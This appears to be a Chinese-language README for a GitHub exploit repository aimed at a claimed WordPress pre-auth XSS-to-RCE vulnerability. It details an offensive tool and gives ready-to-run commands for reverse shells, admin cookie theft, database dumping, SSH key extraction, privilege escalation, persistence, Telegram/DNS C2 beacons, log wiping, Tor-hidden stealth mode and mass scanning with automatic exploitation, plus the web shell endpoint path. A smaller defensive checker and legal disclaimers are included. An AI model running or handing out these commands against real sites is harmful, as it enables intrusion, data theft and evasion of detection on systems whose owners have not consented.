

⚠️ 仅供道德使用 – 仅限授权安全测试
本仓库提供的工具仅供授权安全专业人员、蓝队和渗透测试人员使用。
未经授权访问计算机系统在 CFAA(美国)、《计算机滥用法》(英国)、TCK 243/244(土耳其)以及全球类似法律 下均属违法行为。
CVE‑2026‑64638 是 WordPress 核心版本 4.7.0 至 7.0.2 中存在的一个严重的预认证反射型 XSS 漏洞,攻击者可借助应用程序密码(Application Password)功能将 XSS 攻击升级为完全远程代码执行(RCE)。
strip_tags() 与 WordPress 的 wp_kses_post() 对 HTML 标签的解析方式不同,导致恶意输入能够绕过净化检查。wp-login.php)。登录失败时,payload 被反射回来并在受害者浏览器中执行。| 工具 | 用途 | 适用对象 |
|---|---|---|
exploit.py | 完整利用工具包,支持反弹 Shell、持久化、C2、权限提升、内存取证、数据库导出、SSH 密钥提取和批量扫描。 | 红队 / 授权渗透测试人员 |
safecheck.py | 非侵入式漏洞检查器,可检测 XSS 反射并评估安全态势,无需执行任何恶意 payload。可生成详细报告。 | 蓝队 / 安全审计人员 |
| 功能 | exploit.py | safecheck.py |
|---|---|---|
| 漏洞检测 | ✅ | ✅ |
| WordPress 版本检测 | ✅ | ✅ |
| XSS 反射检测 | ✅ | ✅ |
| 应用程序密码捕获 | ✅ | ❌ |
| 插件上传(RCE) | ✅ | ❌ |
| 反弹 Shell | ✅ | ❌ |
| C2 信标(HTTP/DNS/Telegram) | ✅ | ❌ |
| 权限提升 | ✅ | ❌ |
| 内存取证 | ✅ | ❌ |
| 数据库导出 | ✅ | ❌ |
| SSH 密钥提取 | ✅ | ❌ |
| 持久化方法 | ✅ | ❌ |
| 安全响应头审计 | ❌ | ✅ |
| 配置文件暴露检测 | ❌ | ✅ |
| 目录列表检测 | ❌ | ✅ |
| phpinfo 暴露检测 | ❌ | ✅ |
| 批量扫描 | ✅ | ✅ |
| 代理支持 | ✅ | ✅ |
| Tor 支持 | ✅ | ✅ |
| Ngrok 隧道 | ✅ | ❌ |
| 交互式 Shell | ✅ | ❌ |
| 非侵入式(安全)模式 | ❌ | ✅ |
| JSON / 报告输出 | ✅ | ✅ |
| 场景 | 推荐工具 |
|---|---|
| 蓝队 – 验证您的 WordPress 安装是否存在漏洞 | safecheck.py |
| 安全审计 – 非侵入式漏洞评估 | safecheck.py |
| 红队 – 授权渗透测试与完整利用 | exploit.py |
| 漏洞赏金 – 负责任披露测试 | safecheck.py |
| 批量扫描 – 检查多个目标是否存在漏洞 | exploit.py 或 safecheck.py |
| 应急响应 – 检查系统是否已被入侵 | safecheck.py |
| 高级后渗透 – 持久化、C2、取证 | exploit.py |
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]
exploit.py 参数| 参数 | 说明 |
|---|---|
-t, --target | 目标 WordPress URL(例如 https://wordpress-site.com) |
-l, --list | 包含目标列表的文件(每行一个),用于批量扫描 |
--lhost | 反弹 Shell 回连的本地 IP 地址 |
--lport | 反弹 Shell 的本地端口(默认:4444) |
--proxy | HTTP/HTTPS 代理(例如 http://127.0.0.1:8080) |
--timeout | 请求超时时间(秒)(默认:10) |
--retry | 重试次数(默认:3) |
--threads | 批量扫描的线程数(默认:5) |
--exploit | 批量扫描期间自动利用存在漏洞的目标 |
--ngrok-token | 用于外部隧道的 Ngrok 认证令牌 |
--payload-type | XSS payload 类型:reflected、dom_based、waf_bypass、case_manipulation、double_encoded |
--session-hijack | 启用会话劫持(窃取管理员 Cookie) |
--dump-db | 导出 WordPress 数据库(需要 pymysql) |
--extract-ssh | 从目标系统提取 SSH 密钥 |
--tor | 通过 Tor 路由流量(socks5h://127.0.0.1:9050) |
--stealth | 启用隐身模式(伪造请求头、延迟请求) |
--no-cleanup | 利用完成后跳过日志清理 |
--ssl-verify | 验证 SSL 证书 |
--c2-type | C2 类型:http、dns、telegram |
--c2-server | C2 服务器 URL 或 Telegram 机器人令牌 |
--auto-priv-esc | 获得 Shell 后自动权限提升 |
--memory-forensics | 启用内存取证模块 |
safecheck.py 参数| 参数 | 说明 |
|---|---|
-t, --target | 目标 WordPress URL(例如 https://wordpress-site.com) |
-l, --list | 包含目标列表的文件(每行一个),用于批量扫描 |
--timeout | 请求超时时间(秒)(默认:10) |
--retry | 重试次数(默认:3) |
--threads | 批量扫描的线程数(默认:5) |
--proxy | HTTP/HTTPS 代理(例如 http://127.0.0.1:8080) |
--tor | 通过 Tor 路由流量(socks5h://127.0.0.1:9050) |
--ssl-verify | 验证 SSL 证书 |
--output | 输出 JSON 报告文件 |
-v, --verbose | 详细输出 |
-q, --quiet | 安静模式(最少输出) |
| # | 场景 | 命令 |
|---|---|---|
| 1 | 快速漏洞检查 | python safecheck.py -t https://wordpress-site.com |
| 2 | 带报告的详细扫描 | python safecheck.py -t https://wordpress-site.com --output report.json -v |
| 3 | 带反弹 Shell 的完整利用 | python exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit |
| 4 | 使用自定义 XSS payload | python exploit.py -t https://wordpress-site.com --payload-type waf_bypass |
| 5 | 会话劫持(窃取管理员 Cookie) | python exploit.py -t https://wordpress-site.com --session-hijack |
| 6 | 导出 WordPress 数据库 | python exploit.py -t https://wordpress-site.com --dump-db |
| 7 | 提取 SSH 密钥 | python exploit.py -t https://wordpress-site.com --extract-ssh |
| 8 | 使用 Tor 保持匿名 | python exploit.py -t https://wordpress-site.com --tor --stealth |
| 9 | 通过 Telegram 进行 C2 信标通信 | python exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id" |
| 10 | 从文件批量扫描 | python exploit.py -l targets.txt --threads 10 --exploit |
| 11 | 获得 Shell 后进行内存取证 | python exploit.py -t https://wordpress-site.com --memory-forensics |
| 12 | 自动权限提升 | python exploit.py -t https://wordpress-site.com --auto-priv-esc |
| 13 | 交互式 Shell | python exploit.py -t https://wordpress-site.com -i |
| 14 | Ngrok 隧道 | python exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN |
| 命令 | 说明 |
|---|---|
reverse | 启动反弹 Shell 监听器 |
persist | 应用持久化方法(cron、systemd、rc.local、SSH、WP) |
clean | 清理系统日志和历史记录 |
dumpdb | 导出 WordPress 数据库 |
ssh | 提取 SSH 密钥 |
priv | 自动权限提升 |
mem | 运行内存取证 |
c2 | 显示 C2 状态 |
c2task | 检查 C2 任务 |
exit | 退出交互式 Shell |
| 端点 | 用途 |
|---|---|
/wp-login.php | 登录页面 – XSS 注入点 |
/wp-admin/authorize-application.php | 应用程序密码生成 |
/wp-admin/update.php?action=upload-plugin | 插件上传(RCE) |
/wp-content/plugins/{slug}/{slug}.php | Web Shell 执行 |
本软件仅供教育目的和授权安全测试使用。
| 国家 | 相关法律 |
|---|---|
| 美国 | 《计算机欺诈和滥用法》(CFAA)– 18 U.S.C. § 1030 |
| 英国 | 《计算机滥用法》1990 |
| 土耳其 | TCK 243(未经授权访问)、TCK 244(干扰系统) |
| 德国 | StGB § 202a(数据间谍罪)、§ 202b(数据拦截罪) |
| 法国 | 《戈德弗兰法》(Loi Godfrain)– 第 323-1 条 |
| 澳大利亚 | 《网络犯罪法》2001 |
| 加拿大 | 《刑法典》– 第 342.1 条 |
| 印度 | 《信息技术法》2000 – 第 43、66 条 |
| 日本 | 《禁止未经授权计算机访问法》 |
-v, --verbose |
| 详细输出 |
-q, --quiet | 安静模式(最少输出) |